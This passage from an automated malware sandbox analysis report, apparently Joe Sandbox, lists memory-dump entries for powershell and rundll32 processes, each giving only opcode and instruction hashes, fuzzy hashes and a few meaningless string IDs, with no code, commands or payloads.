                                                                                                                                                            • Opcode Fuzzy Hash: c6f104d71147526e3eae4262dd0ecc3e912e0e2e3253f4a851162b5b7a90a56e
                                                                                                                                                            • Instruction Fuzzy Hash: 1FE02B317114809BCB08CA6DD4044FDFFB99FCA220F14807ED446EB310CA71541B97E0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4f545d6f37be186fc74d4a7bf2f673d36769295fe70d116ec1f8ba203c971029
                                                                                                                                                            • Instruction ID: b533fee82d2499ae2398e72d38de14eebb0512593e6267cc73450ed96fb7e864
                                                                                                                                                            • Opcode Fuzzy Hash: 4f545d6f37be186fc74d4a7bf2f673d36769295fe70d116ec1f8ba203c971029
                                                                                                                                                            • Instruction Fuzzy Hash: 3AF0A0397092905BCF09A778A4087EE6EA2ABC5214F04016EE60A87642CE69090687D5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5e2c453bb107c5c49fa90933fdde481431122dfdb58af8193ac5690c0810565a
                                                                                                                                                            • Instruction ID: 943ca75bc4ac68f013c9059e7ec6befead57f72a090ec58d87f1747a4695827c
                                                                                                                                                            • Opcode Fuzzy Hash: 5e2c453bb107c5c49fa90933fdde481431122dfdb58af8193ac5690c0810565a
                                                                                                                                                            • Instruction Fuzzy Hash: 51F06D789003048BD760DB79E49C39ABBE9EB84310F10446DE10EC7340DB3968818B90
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d380d2c39285db27948ceec1d14b37e6ae537af579977017f93d141a0249bd3c
                                                                                                                                                            • Instruction ID: 5fafe561e94266377000a50dc6bd601e2f59aa1ab96c10906c26fddd9149edf3
                                                                                                                                                            • Opcode Fuzzy Hash: d380d2c39285db27948ceec1d14b37e6ae537af579977017f93d141a0249bd3c
                                                                                                                                                            • Instruction Fuzzy Hash: 55E0C217B032210B4664F2B916006BB89CA8EC6CA1708023DC905DB781DD54CC1907E0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f31da01a8fb233e65798588b5b93bc073ad1aa12b84582a6e15778298ccbcd80
                                                                                                                                                            • Instruction ID: 15a22f77425b0a96e0159f6c3adb4ad6376fadc13c9e7b9e0e64fcb7088aa825
                                                                                                                                                            • Opcode Fuzzy Hash: f31da01a8fb233e65798588b5b93bc073ad1aa12b84582a6e15778298ccbcd80
                                                                                                                                                            • Instruction Fuzzy Hash: 8CE0861574E3D10B5B16957DA4204AA5FB24EC751031E81BAD084CF206C8518C0A43A1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ba0b7da178fe2e833ee772d713e2cd79bf98217fdf6290946ace51356afcde6b
                                                                                                                                                            • Instruction ID: 02a483774194f135e758b451593904d2ba3efd3f288703b882a5faaf51fc772b
                                                                                                                                                            • Opcode Fuzzy Hash: ba0b7da178fe2e833ee772d713e2cd79bf98217fdf6290946ace51356afcde6b
                                                                                                                                                            • Instruction Fuzzy Hash: 47E0DF3930431057CF082779A40C3AE7A5AEBC4724F00002EE60A87341CF6A680283E9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fda17a8e340296e1d46129b9fd7d42169ba7bd3d7ebdfa329be45d7df16c2785
                                                                                                                                                            • Instruction ID: 682edb7dc23d3cc32dfa57994aeb453ce71a03ec699a1514c5c929afada60981
                                                                                                                                                            • Opcode Fuzzy Hash: fda17a8e340296e1d46129b9fd7d42169ba7bd3d7ebdfa329be45d7df16c2785
                                                                                                                                                            • Instruction Fuzzy Hash: A2D05E17703231174568B2BA1A007BBA5CE8EC7CA1709013ADA09CB381ED45CC1903F5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                            • Instruction ID: a512f13118da998e546267dc386d3a74a8b3c569869918b0e830b38661fc733a
                                                                                                                                                            • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                            • Instruction Fuzzy Hash: F9E08631B100149BCB08DA99D4144EDF7AADBCC220F14807AD90AA7340DA32591A87E1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 9f039f79d067b1d92b810cc46bf5ce7f4c74b10291c9d6e345f73677fb0818eb
                                                                                                                                                            • Instruction ID: c60ba194aa51e3b101e59a3208c5de273a8398817eb40d64c6a2229f4703ddb5
                                                                                                                                                            • Opcode Fuzzy Hash: 9f039f79d067b1d92b810cc46bf5ce7f4c74b10291c9d6e345f73677fb0818eb
                                                                                                                                                            • Instruction Fuzzy Hash: AAE04F75D150458FCF06DF60E4496ED7F70EA56315B00009DD45257952DA72454BCB80
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a6ea85b4893f9406b049141b3f4834ae983890b9d91b563ca729e19eca0b08df
                                                                                                                                                            • Instruction ID: a55905dfea9c27159ce47a53fd29df627b1bcf33c2c1106ca7373a605037062f
                                                                                                                                                            • Opcode Fuzzy Hash: a6ea85b4893f9406b049141b3f4834ae983890b9d91b563ca729e19eca0b08df
                                                                                                                                                            • Instruction Fuzzy Hash: E4E04F349092868FCB05EFACE04586FBFB1EB5A214B10429DE9469B642D6710956DF81
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                            • Instruction ID: b49b179cfaca562794cf96dddc0cf6a8e5c55110f867f7c14b2887bffeb9119d
                                                                                                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                            • Instruction Fuzzy Hash: 1CD042B0D05209AF8780EFA9894156EFBF4AB48210B6085AB8919E7201E6329A128BD1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: da257c3d89b563a0b81bf9677962657ffbcc166d475cbde3229133822ba82b98
                                                                                                                                                            • Instruction ID: 0fd0d318bea8e41861d1c7caaa12956da17fd9227d5f65658e420da775bef052
                                                                                                                                                            • Opcode Fuzzy Hash: da257c3d89b563a0b81bf9677962657ffbcc166d475cbde3229133822ba82b98
                                                                                                                                                            • Instruction Fuzzy Hash: 77D067398051098BCF08EBA4F85A5BDBB74FA54302F40516DE91752592EA321A5BCAC5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7ca4ffb5bce2ed6b5bc9ae8c45ded7898bf302979c6c32f3c8d768e61de992ec
                                                                                                                                                            • Instruction ID: 3ada6b672cf393efd286326d48f2c97c1be12f3e2ed9d79f5deaf0e70fcf0345
                                                                                                                                                            • Opcode Fuzzy Hash: 7ca4ffb5bce2ed6b5bc9ae8c45ded7898bf302979c6c32f3c8d768e61de992ec
                                                                                                                                                            • Instruction Fuzzy Hash: 84D05B34D0420A8FCB08DF68E44556DBBB5EB44300F004159ED0593740E7315D06CFC1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6e1df70d6abee7edc07da41e686dea691815adb3b4bc969f57eb9aca1b0f5a33
                                                                                                                                                            • Instruction ID: 8f35a9832645d0c671c4a7f8f0062a67d84ce6779cbb166b15344a928bd78902
                                                                                                                                                            • Opcode Fuzzy Hash: 6e1df70d6abee7edc07da41e686dea691815adb3b4bc969f57eb9aca1b0f5a33
                                                                                                                                                            • Instruction Fuzzy Hash: 3FD0C93444EBC49FC7178F7994998183F316E0322575A04EED88A8F5B7C9768589CB16
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: f85968a2963e22a224d915dec77903dccf9d289ad3eaa26f35104d344351070e
                                                                                                                                                            • Instruction ID: db01ea75134923539fce0f4d2509c519b95e9b1df1fb463577247c2f0cd61891
                                                                                                                                                            • Opcode Fuzzy Hash: f85968a2963e22a224d915dec77903dccf9d289ad3eaa26f35104d344351070e
                                                                                                                                                            • Instruction Fuzzy Hash: 73C04C2480EBD05FDF13833D4C9A5077FB2098351970A55DAC182DF867C9A9884AC753
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 36a068b87e2f66900319b767620dce3cdbea466737e218659a820706469ad2ce
                                                                                                                                                            • Instruction ID: 3d487e29e4a7b670f476a63146ce720eb3edea56a9aec5f904f654ea4fc695fe
                                                                                                                                                            • Opcode Fuzzy Hash: 36a068b87e2f66900319b767620dce3cdbea466737e218659a820706469ad2ce
                                                                                                                                                            • Instruction Fuzzy Hash: E5B09230044708CFC248AFBAA4058147329BB4221538108A9ED0E0A2A68E36E885CA48
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: fiq$84Kl$84Kl$`Qdq$`Qdq$`Qdq$`Qdq$tPdq$tPdq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                                                                                                                            • API String ID: 0-3222819075
                                                                                                                                                            • Opcode ID: 97c8a9e26bece15b6ef80270b3a8becf472eb338ef45594cb7a2a3b4b896bc3d
                                                                                                                                                            • Instruction ID: 60fea20a6baaadf8d39acfd252df2490e66e3cadac4c35010a7a35b07fb21162
                                                                                                                                                            • Opcode Fuzzy Hash: 97c8a9e26bece15b6ef80270b3a8becf472eb338ef45594cb7a2a3b4b896bc3d
                                                                                                                                                            • Instruction Fuzzy Hash: 89B1C2B170022EDFDB15DE58C941AABBBB2BFA5346F14C455E8019B281CB32DD43DBA1
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: tMMl$`eq$`eq$`eq$`eq
                                                                                                                                                            • API String ID: 0-1490437013
                                                                                                                                                            • Opcode ID: 20c59af791fa25d6e03da0cbe92437cc2223109c2121478085dd22616ed47c50
                                                                                                                                                            • Instruction ID: 5b88fd2358c608fad709e92686b563e0e8a1b32d1ff653b913851212b4d0abbe
                                                                                                                                                            • Opcode Fuzzy Hash: 20c59af791fa25d6e03da0cbe92437cc2223109c2121478085dd22616ed47c50
                                                                                                                                                            • Instruction Fuzzy Hash: D9B19274E016199FCB54DFA9D590A9DFBF2FF48300F148629E419AB354DB30A945CF90
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: tMMl$`eq$`eq$`eq$`eq
                                                                                                                                                            • API String ID: 0-1490437013
                                                                                                                                                            • Opcode ID: 6423cd11610d16502a9a5cd5071b9a79eb6465542697ef0720f9a8b35d7dfce4
                                                                                                                                                            • Instruction ID: 142ab0d0c95f1179d1ea2ab15758679bbc23b43cd1b142f5aea3e426989768b1
                                                                                                                                                            • Opcode Fuzzy Hash: 6423cd11610d16502a9a5cd5071b9a79eb6465542697ef0720f9a8b35d7dfce4
                                                                                                                                                            • Instruction Fuzzy Hash: 8FB18274E016199FCB54DFA9D990A9DFBF2FF48300F108629E819AB354DB30A945CF90
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1744656050.00000000036E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036E0000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_36e0000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Co^$Co^$Co^$Co^$Co^
                                                                                                                                                            • API String ID: 0-2499377247
                                                                                                                                                            • Opcode ID: 0c13d4e0bab4e42abb9396158d9b5ab9628d29b52803efecf296c02c1097b2c2
                                                                                                                                                            • Instruction ID: dbdfcba40a7a095a14e8aa356264e04bd50ac53f699cc9a494617202fa38d010
                                                                                                                                                            • Opcode Fuzzy Hash: 0c13d4e0bab4e42abb9396158d9b5ab9628d29b52803efecf296c02c1097b2c2
                                                                                                                                                            • Instruction Fuzzy Hash: 66413A6260E7C00FC307DB3E98A45957FB5AFA729471A00DBD0D4CF667D9189C0AC7A2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $dq$$dq$$dq$Cl$Cl
                                                                                                                                                            • API String ID: 0-344882793
                                                                                                                                                            • Opcode ID: 9ff3b8dafa628d187ec89b62187bb88bd07bff3c765a90f399ec84ccb69aedf7
                                                                                                                                                            • Instruction ID: 76989a19cd63d12a74955432c6280a127bf1f7841bcce5b11038c2388c74e6b2
                                                                                                                                                            • Opcode Fuzzy Hash: 9ff3b8dafa628d187ec89b62187bb88bd07bff3c765a90f399ec84ccb69aedf7
                                                                                                                                                            • Instruction Fuzzy Hash: E611E9B13143269BDB24591AD804B67FBA7EFE5725F24C02FA9498F280CE39C843D791
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $dq$$dq$$dq$$dq
                                                                                                                                                            • API String ID: 0-185584874
                                                                                                                                                            • Opcode ID: 5b4fbbc2eb289ae1c919fd974ce686fae43de0555ebe63a22d50f8b3d611d3b4
                                                                                                                                                            • Instruction ID: 22573f4a0b89b8f5927b9a6221488284a453ffdfc64e5a049d246ccbb5d25c35
                                                                                                                                                            • Opcode Fuzzy Hash: 5b4fbbc2eb289ae1c919fd974ce686fae43de0555ebe63a22d50f8b3d611d3b4
                                                                                                                                                            • Instruction Fuzzy Hash: 1A217CB1310226ABDB246529A801F37FBD79BD0315F34807A9A47CB2C1DD75D9139361
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,SMl$,SMl$p5=k$RMl
                                                                                                                                                            • API String ID: 0-4239231537
                                                                                                                                                            • Opcode ID: b91c9b5a843e1428ade48055175d4fdbc1c1259012a14dd326c12a9b47661519
                                                                                                                                                            • Instruction ID: 9c21f59580c5f7f9d1f45b020d930525a33e4f6c3c38f61422919af60bcbb561
                                                                                                                                                            • Opcode Fuzzy Hash: b91c9b5a843e1428ade48055175d4fdbc1c1259012a14dd326c12a9b47661519
                                                                                                                                                            • Instruction Fuzzy Hash: 09217DF27002368BCB22966C5811A66FBD1DFF6229F1484FBC8868B640DF39D843D761
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1755715329.0000000007D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D20000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_7d20000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4'dq$4'dq$$dq$$dq
                                                                                                                                                            • API String ID: 0-4229963660
                                                                                                                                                            • Opcode ID: 49a6c8a3d0a786d0d0366e51987050269a1c492be2e224f43f61bc82f96e8b13
                                                                                                                                                            • Instruction ID: 1319d26b1cc3bf62f4d37758b9ad28e730008729cf39c9d93dec86cfb4974add
                                                                                                                                                            • Opcode Fuzzy Hash: 49a6c8a3d0a786d0d0366e51987050269a1c492be2e224f43f61bc82f96e8b13
                                                                                                                                                            • Instruction Fuzzy Hash: FD01A76171D7A64FD727516858206669FB35FD3640B2A409BC4C0DB2D2CE194D478366
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: lo7p$d7p
                                                                                                                                                            • API String ID: 0-3642153419
                                                                                                                                                            • Opcode ID: 2860ff7f24f302a508ee640e9320cfdb0fb13860684edf99eee678d2e34500a3
                                                                                                                                                            • Instruction ID: 84947f38cea8c30de04d4fd7731e08f66ca53cac2d80cd8a90fdeac740144e42
                                                                                                                                                            • Opcode Fuzzy Hash: 2860ff7f24f302a508ee640e9320cfdb0fb13860684edf99eee678d2e34500a3
                                                                                                                                                            • Instruction Fuzzy Hash: 82217874B102149FCB44EF69E898AAD7BF2FF88700F258069E446EB3A4CB719C048F50
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: lo7p$d7p
                                                                                                                                                            • API String ID: 0-3642153419
                                                                                                                                                            • Opcode ID: eff7407ee7f54454c4bb2623420c97284e0b835a4c72820b2b11e25408aa02bf
                                                                                                                                                            • Instruction ID: 2c4d85848f5761b5abb48d826e3542773a3d2016c2d99fbff7009ddc1d69c1aa
                                                                                                                                                            • Opcode Fuzzy Hash: eff7407ee7f54454c4bb2623420c97284e0b835a4c72820b2b11e25408aa02bf
                                                                                                                                                            • Instruction Fuzzy Hash: 14213874B102049FCB44EF69D598A6D7BF6EF8C600F2190A9E406EB3A5DB759C048B51
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 221f51f448574c49bc04b36611749cf1a496b673f726210d916807e81708a371
                                                                                                                                                            • Instruction ID: efd06dadc565d5eeefc90d0bca2d19a0a809f91a12fe432a9117da300c0ab33c
                                                                                                                                                            • Opcode Fuzzy Hash: 221f51f448574c49bc04b36611749cf1a496b673f726210d916807e81708a371
                                                                                                                                                            • Instruction Fuzzy Hash: C5E02B32608184AFCB11AF78E85889D3FB7EFC631170940EBE44ADB396CA380C05DB91
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a61bdae20372aef1bb27a5df03b695d70d3cc3a2078bb410783a3edcc17c8f26
                                                                                                                                                            • Instruction ID: f983ab12d10d0b27c8c86a792ea24ab4a9de8160eb1a241a45451f71b56275e1
                                                                                                                                                            • Opcode Fuzzy Hash: a61bdae20372aef1bb27a5df03b695d70d3cc3a2078bb410783a3edcc17c8f26
                                                                                                                                                            • Instruction Fuzzy Hash: 19518074B002208FCB48EB39D894B6E77E7BFC8251B2544A8E509DB375DE35EC018B90
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 7079090c0692d81122b622a554bab5df24a20a31cf6f62512206295d4741ad5e
                                                                                                                                                            • Instruction ID: 242b85156e4a36d7caf01e835b0dad6c3aeb44bd64859333f1368893636699a4
                                                                                                                                                            • Opcode Fuzzy Hash: 7079090c0692d81122b622a554bab5df24a20a31cf6f62512206295d4741ad5e
                                                                                                                                                            • Instruction Fuzzy Hash: 7551E4307003688FDF0AAB78D8507AE7AE7ABC9301F14406DD90D9B395CF795D829B91
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 5cb0ab5b7e44525d8b21b20b4ff7c266cc4dde51f84eb3dfe1396258da8f5419
                                                                                                                                                            • Instruction ID: 653380111c3709209bd96c3bd930e107845ff1679b4114155875099582cc4132
                                                                                                                                                            • Opcode Fuzzy Hash: 5cb0ab5b7e44525d8b21b20b4ff7c266cc4dde51f84eb3dfe1396258da8f5419
                                                                                                                                                            • Instruction Fuzzy Hash: 8F516174B002208FDB48EF39D894A6E77E7AFC8651F2544A8E609DB375DE35EC418B90
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.2602627968.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_4e80000_rundll32.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 87037db80959730822e13737bc506a015fa0ef260011d235b2ab8439cead5ee3
